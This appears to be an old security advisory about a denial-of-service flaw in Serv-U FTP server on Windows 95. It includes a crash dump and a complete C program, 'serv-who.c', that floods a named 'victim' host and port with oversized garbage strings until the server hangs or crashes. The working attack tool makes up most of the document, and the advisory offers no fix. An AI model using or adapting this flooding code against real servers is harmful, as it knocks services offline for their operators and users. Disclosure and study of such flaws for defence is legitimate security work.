COMMAND

    Serv-U FTP

SYSTEMS AFFECTED

    Win95

PROBLEM

    whiz found following  problem Serv-U FTP  by Cat-Soft.   After you
    connect instead of sending the normal USER then PASS, you can send
    garbage.  And if you send  alot of garbage at a high  speed Serv-U
    will stop responding to mouse  clicks and after a short  amount of
    time will crash and give you this:

        SERV-U32 caused a stack fault in module KERNEL32.DLL at 014f:bff9a08c.
        Registers:
        EAX=005e2084 CS=014f EIP=bff9a08c EFLGS=00000246
        EBX=17bf0514 SS=0157 ESP=005e2080 EBP=005e20d4
        ECX=005e2098 DS=0157 ESI=81628c70 FS=2347
        EDX=ffffffff ES=0157 EDI=0000ffff GS=0000
        Bytes at CS:EIP:
        5e 8b e5 5d c2 10 00 64 a1 00 00 00 00 55 8b ec
        Stack dump:
        00000001 c00000fd 00000000 00000000 bff9a08c 00000000 01570157 01870028
        17bf0b6a c10fabe8 16c70001 80dc0014 16e73a45 00040000 02000000 bff97fdc

    It only acts this way in the windows 95 version.  Under NT the cpu
    usage goes up to 100%, but no crash.  Alot of times even after the
    crashed  Serv-U  has  closed,  Windows   is  still  slow  to   non
    responsive.  Program used for this follows:

    /*
            serv-who.c - 1998 - whiz
            kills Serv-U ftp on win95 boxes

            Tested on:
            i586/100 - 72 meg RAM - crashed 5 times - Serv-U FTP-Server v2.3a
            i586/300 - 32 meg RAM - crashed 2 times - Serv-U FTP-Server v2.3b
            ?/? - ? meg RAM - crashed 2 times - Serv-U FTP-Server v2.3
            i586/233 - 32 meg RAM - crashed 1 time - Serv-U FTP-Server v2.2

            >>> Thanks to gen for helping me test this. <<<

            Another thing that might effect  this program is how fast  the
            serv-who computer's internet connection is.  Or in other words
            how much faster is  it then the victim's  link.  A Faster  one
            will give a higher success rate.
    */

    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>


    int x, s, i, p, dport;

    char *str =
    "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    *
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    struct sockaddr_in addr, spoofedaddr;
    struct hostent *host;


    int open_sock(int sock, char *server, int port) {
         struct sockaddr_in blah;
         struct hostent *he;
         bzero((char *)&blah,sizeof(blah));
         blah.sin_family=AF_INET;
         blah.sin_addr.s_addr=inet_addr(server);
         blah.sin_port=htons(port);

        if ((he = gethostbyname(server)) != NULL) {
            bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
        }
        else {
             if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
               perror("gethostbyname()");
               return(-3);
             }
        }

            if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
                 perror("connect()");
                 close(sock);
                 return(-4);
            }
            printf("     Connected to [%s:%d].\n",server,port);
            return;
    }


    void main(int argc, char *argv[]) {
         int t;
         if (argc != 3) {
           printf("serv-who.c - whiz\n\n");
           printf("kills serv-u ftp daemons\n\n");
           printf("Usage: %s <victim> <port>\n",argv[0]);
           exit(0);
         }
         printf("serv-who.c - whiz\n\n");
         if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
            perror("socket()");
            exit(-1);
         }
         p = atoi(argv[2]);
         open_sock(s,argv[1],p);

         printf("     Sending crap to %s on port %i... \n", argv[1], p);
         for (i=0; i<1000; i++) {            /* loop is REAL high, most likely
    */
           send(s,str,strlen(str),0x0);      /* it will exit with a */
                             send(s,str,strlen(str)*20+1,0x0); /* "Broken Pipe" error before */
           send(s,str,strlen(str)*25+2,0x0); /* finishing the loop */
           send(s,str,strlen(str)*30+3,0x0);
           send(s,str,strlen(str)*35+4,0x0);
           send(s,str,strlen(str)*40+5,0x0); /* i just went crazy on the sends */
           send(s,str,strlen(str)*45+4,0x0); /* pay no attention to them */
           send(s,str,strlen(str)*50+5,0x0);
           send(s,str,strlen(str)*255+4,0x0);
           send(s,str,strlen(str)*182+5,0x0);
           send(s,str,strlen(str)*888+4,0x0);
           send(s,str,strlen(str)*666+5,0x0);
           send(s,str,strlen(str)*20+1,0x0);
           send(s,str,strlen(str)*25+2,0x0);
           send(s,str,strlen(str)*30+3,0x0);
           send(s,str,strlen(str)*35+4,0x0);
           send(s,str,strlen(str)*40+5,0x0);
           send(s,str,strlen(str)*45+4,0x0);
           send(s,str,strlen(str)*50+5,0x0);
           send(s,str,strlen(str)*255+4,0x0);
           send(s,str,strlen(str)*182+5,0x0);
           send(s,str,strlen(str)*888+4,0x0);
           send(s,str,strlen(str)*666+5,0x0);
         }
         printf("all done\n");
         close(s);
    }

SOLUTION

    Nothing yet.